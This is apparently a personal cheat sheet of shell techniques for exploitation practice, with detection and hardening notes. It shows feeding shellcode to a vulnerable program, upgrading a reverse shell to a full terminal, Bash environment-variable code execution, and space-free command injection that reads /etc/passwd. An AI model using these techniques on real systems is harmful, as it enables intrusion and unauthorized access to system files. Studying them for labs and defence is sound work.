Various notes on helpful command line and shell-isms.
Helpful when working with an exploitable program that reads from stdin.
# https://security.stackexchange.com/a/120501
# cat writes shellcode.hex into the pipe first and then continues with "-"
# (its own stdin, normally the terminal). The program's stdin therefore stays
# open after the file has been sent, and anything typed afterwards is forwarded
# to it. Without the "-" the program sees EOF as soon as the file ends.
cat shellcode.hex - | ./vulnerable_program
# https://stackoverflow.com/a/36327396
#!/bin/bash
# Serve a stdin/stdout program ("myapp") over TCP, e.g. to practise against it
# the way a remote challenge would be exposed.
# coproc starts myapp in the background with its stdio attached to pipes:
# ${COPROC[0]} reads myapp's output, ${COPROC[1]} writes to myapp's input.
coproc myapp
# nc listens on TCP port 4000 (-l) and keeps listening after a client
# disconnects (-k); its stdin is fed from myapp's output and its stdout goes to
# myapp's input, so a connected client talks to myapp directly.
# NOTE(review): no bind address is given, so the listener is presumably
# reachable on every interface, with no authentication or encryption. Keep it
# on an isolated lab network or firewall the port.
# NOTE(review): option syntax differs between netcat implementations ("-k" and
# "-p" together with "-l" are not accepted by all of them); confirm against the
# installed nc.
nc -kl -p 4000 <&"${COPROC[0]}" >&"${COPROC[1]}"
# https://stackoverflow.com/a/17030976
# Prints "A" ten times, without a trailing newline. Brace expansion {1..10}
# produces ten arguments and printf reuses the format once per argument;
# "%0.s" formats each argument as a string with precision zero (prints nothing),
# so only the literal "A" is emitted each time. Change 10 to change the length.
printf "%0.sA" {1..10}
# Giving a reverse shell a proper terminal (pty), so that job control, line
# editing and full-screen programs work.
# Note: the next two commands are executed in the reverse shell; either one
# allocates a pseudo-terminal for the session.
# script(1) runs a shell on a new pty; /dev/null discards its typescript file.
script /dev/null
# Note: There are probably alternatives to python.
python -c 'import pty;pty.spawn("/bin/bash");'
# Press Ctrl+Z. This suspends the local program that holds the connection, so
# the next two commands run in the local terminal, not in the reverse shell.
# raw / -echo: the local terminal stops interpreting and echoing keystrokes, so
# control characters are handled by the remote pty instead.
stty raw -echo
fg
# Press enter a few times.
# Now you can execute 'bash -i' or other things.
# Setting the 'TERM=xterm' env. var (the variable is TERM, not XTERM) can be
# helpful for 'top' and other things too.
# The local terminal stays in raw mode once the session ends; 'reset' or
# 'stty sane' restores it.
# Detection: 'script /dev/null' or 'python -c "import pty;pty.spawn(...)"'
# running as a child of a network-facing service is a common sign of an
# interactive shell on a compromised host and is worth a rule in
# process-execution telemetry.
# Environment variables that cause Bash to run code.
# Bash imports an environment variable named "BASH_FUNC_<name>%%" whose value
# starts with "() {" as a shell function called <name>.
# Note: "export" does not like this syntax ("%" is not valid in a shell
# variable name, so the assignment below is illustrative rather than something
# that can be typed as-is); you need to find another way to
# set the environment variable through a parent process.
# The following example overrides "echo" to call "/bin/echo" with a prefix:
BASH_FUNC_echo%%='() { /bin/echo "w00t $@"; }'
# An interactive Bash runs the value of PROMPT_COMMAND before printing each
# prompt, so with the override above every prompt would invoke the replaced
# "echo".
export PROMPT_COMMAND="echo foo"
# This example executes "/path/to/my/script.sh" when a new Bash shell starts.
# NOTE(review): Bash consults BASH_ENV only when it starts non-interactively
# (running a script or "bash -c ..."); the plain interactive "bash" below reads
# ~/.bashrc instead, so it would presumably not source the file. Confirm.
export BASH_ENV=/path/to/my/script.sh
bash
# Hardening: all three variables are inherited across exec, so any boundary
# where a less-trusted party controls the environment of a Bash process (CGI,
# sudo with a permissive env_keep, sshd AcceptEnv, wrappers run by privileged
# jobs) has to scrub the environment first. "bash -p" (privileged mode) ignores
# BASH_ENV and does not import functions from the environment.
"Command injection without spaces", fyoorer
# Bash:
# Brace expansion turns {echo,foo.bar} into the two words "echo" and "foo.bar",
# so a command runs with an argument although the input contains no space.
{echo,foo.bar}
# Other shells:
# $'\x20' is ANSI-C quoting for a space character. "cat$args" expands to
# "cat /etc/passwd", and because the expansion is unquoted it is word-split
# into the command "cat" and the argument "/etc/passwd".
# NOTE(review): this relies on the shell supporting $'...' quoting and
# word-splitting unquoted expansions, which is not the default everywhere
# (zsh, for one, does not split); confirm per shell.
args=$'\x20/etc/passwd'
cat$args
# Takeaway for input validation: rejecting or stripping space characters does
# not stop argument or command injection once the input reaches a shell. Pass
# untrusted values as separate argv elements to an exec-style API (no shell),
# or validate them against an allow-list.